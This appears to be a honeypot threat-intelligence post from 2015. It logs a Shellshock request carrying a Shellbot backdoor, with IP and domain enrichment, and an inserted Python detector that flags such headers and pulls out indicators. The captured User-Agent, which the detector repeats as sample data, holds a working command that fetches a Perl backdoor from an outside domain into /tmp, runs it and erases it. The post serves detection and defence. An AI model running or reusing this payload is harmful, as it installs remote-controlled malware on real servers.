Saturday, 31 October 2015

193.107.88.186 - Backdoor.Perl.Shellbot.jf via tecnoalianza.com

BEGIN OF HTTP DATA:
2015-10-31 01:14:48
Source IP: 193.107.88.186
Country: PL RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'
Host: 195.169.125.87
Connection: Close
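One way to flag requests like the one captured above, as an added detection example that is not part of the original post: it parses a raw HTTP request, looks for the Shellshock (CVE-2014-6271) function-definition prefix (`() { ... };`) in any header value, and pulls out the download URLs and `/tmp` drop paths that would go into a blocklist or an incident ticket. The two sample requests are constructed for the example (the first reuses the User-Agent captured above, the second is a benign browser request); the result field names are my own choice and the honeypot is assumed to log the raw request text.

```python
import re
from typing import Dict, List, Optional

# Shellshock marker: an empty function body "() { ... };" placed in a header
# value; whatever follows the closing "};" is the trailing command bash runs.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")
URL_RE = re.compile(r"https?://[^\s\"';]+")
TMP_PATH_RE = re.compile(r"/tmp/[\w.\-]+")

# Constructed sample requests (assumption: honeypot stores the raw request).
SAMPLE_REQUESTS: List[str] = [
    # First sample reuses the User-Agent captured in the post above.
    r"""GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'
Host: 195.169.125.87
Connection: Close
""",
    # Second sample is a benign request: parentheses are not empty, no "{".
    r"""GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/41.0
Host: example.invalid
Connection: Close
""",
]


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw request into lowercase header name -> value.

    The request line is skipped; only the first ':' separates name and value,
    so colons inside the payload stay part of the value.
    """
    headers: Dict[str, str] = {}
    for line in raw.strip().splitlines()[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def analyse_request(raw: str) -> Optional[dict]:
    """Return a finding dict if any header carries a Shellshock prefix, else None."""
    for name, value in parse_headers(raw).items():
        match = SHELLSHOCK_RE.search(value)
        if not match:
            continue
        trailing = value[match.end():]  # the command chain after "};"
        return {
            "header": name,
            "command": trailing.strip(),
            # Deduplicated indicators for blocking / hunting.
            "urls": sorted(set(URL_RE.findall(trailing))),
            "paths": sorted(set(TMP_PATH_RE.findall(trailing))),
        }
    return None


def scan_requests(requests: List[str]) -> List[dict]:
    """Run the detector over a batch of raw requests, keeping only hits."""
    findings = []
    for raw in requests:
        finding = analyse_request(raw)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(f"Shellshock attempt in header '{hit['header']}'")
        print("  download URLs:", hit["urls"])
        print("  drop paths:   ", hit["paths"])
```

The regex anchors on the empty-function prefix rather than on the specific Perl one-liner, so it also catches variants that swap in a different downloader or drop path; the extracted URLs and paths are what you would feed to a proxy blocklist and a host-side search for the dropped file.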

Domain Name: TECNOALIANZA.COM (66.240.252[.]12)
Registry Domain ID: 137741512_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2014-12-18T11:44:43Z

193.107.88[.]186

Static Source: GeoIP data
  • Country: Poland
  • ASN: AS48505 Kylos sp. z o.o.
Dynamic Source: SANS Internet Storm Cast
  • comment: IP is listed on SANS ISC
  • comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/193.107.88.186

Feed search for 193.107.88[.]186

66.240.252[.]12

Static Source: GeoIP data
  • Country: United States
  • ASN: AS10439 CariNet, Inc.
Dynamic Source: SANS Internet Storm Cast
  • comment: IP is listed on SANS ISC
  • comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/66.240.252.12

Feed search for 66.240.252[.]12